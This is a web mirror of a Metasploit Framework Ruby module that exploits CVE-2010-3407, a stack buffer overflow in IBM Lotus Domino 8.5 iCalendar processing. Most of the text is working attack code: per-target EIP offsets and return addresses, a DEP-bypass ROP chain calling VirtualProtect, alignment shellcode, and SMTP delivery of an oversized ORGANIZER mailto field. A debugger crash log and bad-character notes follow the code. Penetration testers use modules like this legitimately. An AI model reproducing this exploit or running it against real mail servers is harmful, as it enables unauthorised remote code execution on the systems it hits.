Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/lotus/domino_icalendar_organizer.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => "IBM Lotus Domino iCalendar MAILTO Buffer Overflow",
16
'Description' => %q{
17
This module exploits a vulnerability found in IBM Lotus Domino iCalendar. By
18
sending a long string of data as the "ORGANIZER;mailto" header, process "nRouter.exe"
19
crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to
20
gain arbitrary code execution.
21
22
Note: In order to trigger the vulnerable code path, a valid Domino mailbox account
23
is needed.
24
},
25
'License' => MSF_LICENSE,
26
'Author' => [
27
'A. Plaskett', # Initial discovery, poc
28
'sinn3r' # Metasploit
29
],
30
'References' => [
31
[ 'CVE', '2010-3407' ],
32
[ 'OSVDB', '68040' ],
33
[ 'ZDI', '10-177' ],
34
[ 'URL', 'http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/' ],
35
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515' ]
36
],
37
'Payload' => {
38
'BadChars' => [*(0x00..0x08)].pack("C*") + [*(0x10..0x18)].pack("C*") + [*(0x1a..0x1f)].pack("C*") + "\x2c" + [*(0x80..0xff)].pack("C*"),
39
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
40
'EncoderOptions' => { 'BufferRegister' => 'ECX' },
41
'StackAdjustment' => -3500
42
},
43
'DefaultOptions' => {
44
'EXITFUNC' => "process",
45
},
46
'Platform' => 'win',
47
'Targets' => [
48
[
49
'Lotus Domino 8.5 on Windows 2000 SP4',
50
{
51
'Offset' => 2374, # Offset to EIP
52
'Ret' => 0x6030582B, # JMP ECX
53
'MaxBuffer' => 9010 # Total buffer size
54
}
55
],
56
[
57
'Lotus Domino 8.5 on Windows Server 2003 SP0',
58
{
59
'Offset' => 2374, # Offset to EIP
60
'Ret' => 0x6030582B, # JMP ECX (Domino\\nnotes.dll)
61
'MaxBuffer' => 9010 # Total buffer size
62
}
63
],
64
[
65
'Lotus Domino 8.5 on Windows Server 2003 SP2',
66
{
67
'Offset' => 2374, # Offset to EIP
68
'Ret' => 0x604C4222, # ADD AL,0x5E ; RETN
69
'EAX' => 0x7C35287F, # Initial CALL VirtualProtect addr to align (MSVCR71.dll)
70
'EaxOffset' => 2342, # Offset to EAX
71
'RopOffset' => 24, # Offset to ROP gadgets
72
'MaxBuffer' => 9010 # Total buffer size
73
}
74
],
75
],
76
'DisclosureDate' => '2010-09-14',
77
'DefaultTarget' => 2,
78
'Notes' => {
79
'Reliability' => UNKNOWN_RELIABILITY,
80
'Stability' => UNKNOWN_STABILITY,
81
'SideEffects' => UNKNOWN_SIDE_EFFECTS
82
}
83
)
84
)
85
86
register_options(
87
[
88
Opt::RPORT(25),
89
OptString.new('MAILFROM', [true, 'Valid Lotus Domino mailbox account', '']),
90
OptString.new('MAILTO', [true, 'Valid Lotus Domino mailbox account', ''])
91
]
92
)
93
end
94
95
def check
96
connect
97
banner = (sock.get_once(-1, 5) || '').chomp
98
disconnect
99
100
if banner =~ /Lotus Domino Release 8\.5/
101
return Exploit::CheckCode::Appears
102
else
103
return Exploit::CheckCode::Safe
104
end
105
end
106
107
def exploit
108
sploit = ''
109
if target.name =~ /Windows 2000 SP4/
110
111
sploit << rand_text_alpha(934)
112
sploit << payload.encoded
113
sploit << rand_text_alpha((target['Offset'] - sploit.length))
114
sploit << [target.ret].pack('V')
115
sploit << rand_text_alpha((target['MaxBuffer'] - sploit.length))
116
117
elsif target.name =~ /Server 2003 SP0/
118
119
sploit << rand_text_alpha(930)
120
sploit << payload.encoded
121
sploit << rand_text_alpha((target['Offset'] - sploit.length))
122
sploit << [target.ret].pack('V')
123
sploit << rand_text_alpha((target['MaxBuffer'] - sploit.length))
124
125
elsif target.name =~ /Server 2003 SP2/
126
127
# Borrow a "CALL VirtualProtect()" in Domino's MSVCR71.dll to bypass DEP
128
# shellcode max = 1312 bytes
129
rop_gadgets =
130
[
131
# EAX should be aligned to CALL VirtualProtect at this point
132
0x604F5728, # MOV DWORD PTR DS:[ECX],EAX; RETN (nnotes.dll)
133
# Set shellcode address
134
0x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)
135
0x62454F32, # ADD AL,2B; RETN (nlsccstr.dll)
136
0x603F7B38, # ADD AL,31; RETN (nnotes.dll)
137
0x624B7040, # MOV DWORD PTR DS:[ECX+4],EAX; RETN (nnotes.dll)
138
# Set RETN value
139
0x60577B7A, # XCHG EAX,EDX; RETN (nnotes.dll)
140
0x62452E35, # MOV EAX,ECX; RETN (nlsccstr.dll)
141
0x60606F4E, # ADD AL,5D; RETN (nlsccstr.dll)
142
0x603E6260, # DEC EAX; RETN (nnotes.dll)
143
0x603E6260, # DEC EAX; RETN (nnotes.dll)
144
0x603E6260, # DEC EAX; RETN (nnotes.dll)
145
0x603E6260, # DEC EAX; RETN (nnotes.dll)
146
0x603E6260, # DEC EAX; RETN (nnotes.dll)
147
0x7C3A4C72, # MOV DWORD PTR DS:[EAX],EDX; RETN (msvcp71.dll)
148
0x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)
149
0x60253B6D, # XCHG EAX,EBP; RETN (nnotes.dll)
150
# Set Size (0x413)
151
0x605A4B30, # MOV EAX,205; RETN (nnotes.dll)
152
0x605A4B30, # MOV EAX,205; RETN (nnotes.dll)
153
0x60592A36, # ADD EAX,107; RETN (nnotes.dll)
154
0x603B4C27, # ADD AL,2B; RETN (nnotes.dll)
155
0x624B7044, # MOV DWORD PTR DS:[ECX+8],EAX; RETN
156
0x604C5225, # XOR EAX, EAX; RETN
157
# newProtect
158
0x60386C3C, # MOV AL,3B; RETN (nnotes.dll)
159
0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
160
0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
161
0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
162
0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
163
0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
164
0x624B7048, # MOV DWORD PTR DS:[ECX+C],EAX; RETN
165
# oldProtect
166
0x602B7353, # MOV EAX,ESI; POP ESI; RETN (nnotes.dll)
167
0x41414141, # ESI
168
0x624B704C, # MOV DWORD PTR DS:[ECX+10],EAX; RETN (nlsccstr.dll)
169
# Call VirtualProtect
170
0x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)
171
0x60276256, # XCHG EAX,ESP; RETN (nnotes.dll)
172
].pack("V*")
173
174
align = "\x51" # PUSH ECX
175
align << "\x58" # POP EAX
176
align << "\x34\x43" # XOR AL,43
177
align << "\x40" # INC EAX
178
align << "\x34\x65" # XOR AL,65
179
align << "\x50" # PUSH EAX
180
align << "\x59" # POP ECX
181
182
sploit << rand_text_alpha(1022)
183
sploit << align
184
sploit << payload.encoded
185
sploit << rand_text_alpha((target['EaxOffset'] - sploit.length))
186
sploit << [target['EAX']].pack('V')
187
sploit << rand_text_alpha((target['Offset'] - sploit.length))
188
sploit << [target.ret].pack('V')
189
sploit << rand_text_alpha((target['RopOffset']))
190
sploit << rop_gadgets
191
sploit << rand_text_alpha((target['MaxBuffer'] - sploit.length))
192
193
end
194
195
fname = rand_text_alpha(4)
196
prod_id = rand_text_alpha_upper(5) + "@" + rand_text_alpha_upper(13) + "@" + rand_text_alpha_upper(24)
197
uid = rand_text_alpha_upper(15)
198
summary = rand_text_alpha_upper(5) + "@" + rand_text_alpha_upper(11)
199
status = rand_text_alpha_upper(4)
200
201
body = "Content-Type: text/calendar; method=COUNTER; charset=UTF-8\r\n"
202
body << "#{fname}.txt\r\n"
203
body << "MIME-Version: 1.0\r\n"
204
body << "Content-Transfer-Encoding: 8bit\r\n"
205
body << "BEGIN:VCALENDAR\r\n"
206
body << "METHOD:COUNTER\r\n"
207
body << "PRODID:-//#{prod_id}//\r\n"
208
body << "VERSION:2.0\r\n"
209
body << "BEGIN:VEVENT\r\n"
210
body << "UID:#{uid}\r\n"
211
body << "SEQ:2\r\n"
212
body << "RRULE:aaaa\r\n"
213
body << "ORGANIZER:mailto:H@#{sploit}.com\r\n"
214
body << "ATTENDEE;:Mailto:#{datastore['MAILTO']}\r\n"
215
body << "SUMMARY:#{summary}\r\n"
216
body << "DTSTART:20091130T093000Z\r\n"
217
body << "DTEND:20091130T093000Z\r\n"
218
body << "DTSTAMP:20091130T083147Z\r\n"
219
body << "LOCATION:Location\r\n"
220
body << "STATUS:#{status}\r\n"
221
body << "END:VEVENT\r\n"
222
body << "END:VCALENDAR\r\n"
223
body << "\r\n.\r\n"
224
225
commands =
226
{
227
:HELO => "HELO localhost\r\n",
228
:FROM => "MAIL FROM: <#{datastore['MAILFROM']}>\r\n",
229
:RCPT => "RCPT TO: <#{datastore['MAILTO']}>\r\n",
230
:DATA => "DATA\r\n",
231
:MESG => body,
232
:QUIT => "QUIT\r\n",
233
}
234
235
print_status("Trying target #{target.name}")
236
237
connect
238
239
# Get SMTP Banner
240
res = (sock.get_once || '').chomp
241
print_status("Banner: #{res}")
242
243
# Check banner before trying the exploit
244
if res !~ /Lotus Domino Release 8.5/
245
print_error("Remote service does not seem to be Lotus Domino 8.5")
246
disconnect
247
return
248
end
249
250
# Send HELO
251
sock.put(commands[:HELO])
252
res = sock.get_once || ''
253
print_status("Received: #{res.chomp}")
254
255
# Set MAIL FROM
256
sock.put(commands[:FROM])
257
res = sock.get_once || ''
258
print_status("Received: #{res.chomp}")
259
260
# Set RCPT
261
sock.put(commands[:RCPT])
262
res = sock.get_once || ''
263
print_status("Received: #{res.chomp}")
264
265
# Set DATA
266
sock.put(commands[:DATA])
267
res = sock.get_once || ''
268
print_status("Received: #{res.chomp}")
269
270
# Send malicious data
271
sock.put(commands[:MESG])
272
res = sock.get_once
273
274
# QUIT
275
sock.put(commands[:QUIT])
276
res = sock.get_once || ''
277
print_status("Received: #{res.chomp}")
278
279
handler
280
disconnect
281
end
282
end
283
284
=begin
285
0:008> r
286
eax=41414141 ebx=00000004 ecx=08da9700 edx=08dab695 esi=06c248bc edi=00000014
287
eip=42424242 esp=08da9cc0 ebp=41414141 iopl=0 nv up ei pl nz na pe nc
288
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
289
42424242 ?? ???
290
0:008> !exchain
291
08daea2c: nRouter+511bb (004511bb)
292
08daffdc: kernel32!_except_handler3+0 (77e70abc)
293
CRT scope 0, filter: kernel32!BaseThreadStart+3a (77e4a92d)
294
func: kernel32!BaseThreadStart+4b (77e4a943)
295
Invalid exception stack at ffffffff
296
0:008> k
297
ChildEBP RetAddr
298
WARNING: Frame IP not in any known module. Following frames may be wrong.
299
08da9cbc 43434343 0x42424242
300
08da9cc0 43434343 0x43434343
301
...
302
0:008> bl
303
0 e 602738f9 0001 (0001) 0:**** nnotes!MailCheck821Address+0xb09
304
0:008> u 602738f9
305
nnotes!MailCheck821Address+0xb09:
306
602738f9 e80239d9ff call nnotes!Cstrcpy (60007200)
307
602738fe eb02 jmp nnotes!MailCheck821Address+0xb12 (60273902)
308
60273900 33ff xor edi,edi
309
60273902 8d8dc0faffff lea ecx,[ebp-540h]
310
60273908 51 push ecx
311
60273909 8d95bcf6ffff lea edx,[ebp-944h]
312
6027390f 52 push edx
313
60273910 e8eb38d9ff call nnotes!Cstrcpy (60007200)
314
315
Badchars:
316
0x01=0x0F21, 0x02=0x0f22, 0x03=0x0f23, 0x04=0x0f24, 0x05=0x0f25, 0x06=0x0f26, 0x07=0x0f27
317
0x08=0x0f28, 0x0a=nocrash, 0x0b=0x0f2b, 0x0c=0x0f2c, 0x0d=nocrash, 0x0e=0x0f2e 0x0f=0x0f2f,
318
0x10=0x0f30, 0x11=0x0f31, 0x12=0x0f32, 0x13=0x0f33, 0x14=0x0f34, 0x15=0x0f35, 0x16=0x0f36,
319
0x17=0x0f37, 0x18=0x0f38, 0x1a=0x0f3a, 0x1b=0x0f3b, 0x1c=0x0f3c, 0x1d=0x0f3d, 0x1e=0x0f3e,
320
0x1f=0x0f3f, 0x2c=nocrash, 0x80..0xff = ""
321
=end
322
323